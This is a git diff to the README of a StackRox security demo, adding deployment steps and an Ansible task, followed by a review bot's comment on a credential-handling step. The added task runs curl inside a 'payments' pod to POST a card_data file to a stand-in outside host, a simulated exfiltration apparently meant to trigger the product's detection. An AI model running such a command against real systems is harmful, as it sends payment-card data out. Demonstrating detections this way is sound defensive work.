diff --git a/README.md b/README.md
index 384ce45..4c98de7 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,11 @@
 # Stackrox Demo
 
+## Deploy central
+
+TODO
+
+## Deploy demo
+
 Create secrets.yaml and review it.
 
 ```sh
@@ -20,6 +26,17 @@ echo -n > ansible/roles/ocp4_workload_stackrox_demo_apps/tasks/pre_workload.yml
 echo -n > ansible/roles/ocp4_workload_stackrox_demo_pipeline/tasks/pre_workload.yml
 ```
 
+Edit `roles/ocp4_workload_stackrox_demo_apps/tasks/deploy_demos.yml` and modify accordingly.
+
+```yaml
+- name: k8s_exec violation
+ kubernetes.core.k8s_exec:
+ namespace: payments
+ pod: "{{ r_processor_pod.resources[0].metadata.name }}"
+ command: 'curl -X POST --data-binary @/var/lib/processor/card_data http://innocent.site.web'
+ ignore_errors: yes
+```
+
 Deploy the demo.
 
 ```sh
@@ -29,3 +46,12 @@ export K8S_AUTH_KUBECONFIG="$KUBECONFIG"
 ansible-playbook install.yaml
 ```
 
+## With a custom registry
+
+```sh
+./mirror.sh
+oc apply -f icsp.yaml
+podman login registry.itix.xyz
+base64 -w0 ${XDG_RUNTIME_DIR}/containers/auth.json > /tmp/auth.b64
+echo "ocp4_workload_stackrox_demo_apps_pull_secret: $(cat /tmp/auth.b64)" >> ansible/group_vars/all/secrets.yaml
+```
diff --git a/ansible/agnosticd b/ansible/agnosticd
index 0479e02..1f4e260 160000
--- a/ansible/agnosticd
+++ b/ansible/agnosticd
@@ -1 +1 @@
-Subproject commit 0479e02b2c9a2e018e2543c9940c8279f3246e2d
+Subproject commit 1f4e26026d72ef0824358e2d4cdf8038b8549040
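Review bot: In the README.md hunk at `@@ -29,3 +46,12 @@`, the "With a custom registry" steps write the base64-encoded registry credentials to the fixed path `/tmp/auth.b64`, which is created with the caller's default umask (commonly readable by other local users) and is never removed afterwards. The intermediate file is not needed; the last two commands can be a single line that also quotes the path: `echo "ocp4_workload_stackrox_demo_apps_pull_secret: $(base64 -w0 "${XDG_RUNTIME_DIR}/containers/auth.json")" >> ansible/group_vars/all/secrets.yaml`. Because `secrets.yaml` now carries a pull secret, the section should also state that the file must stay out of version control; whether it is already git-ignored is not visible in this diff.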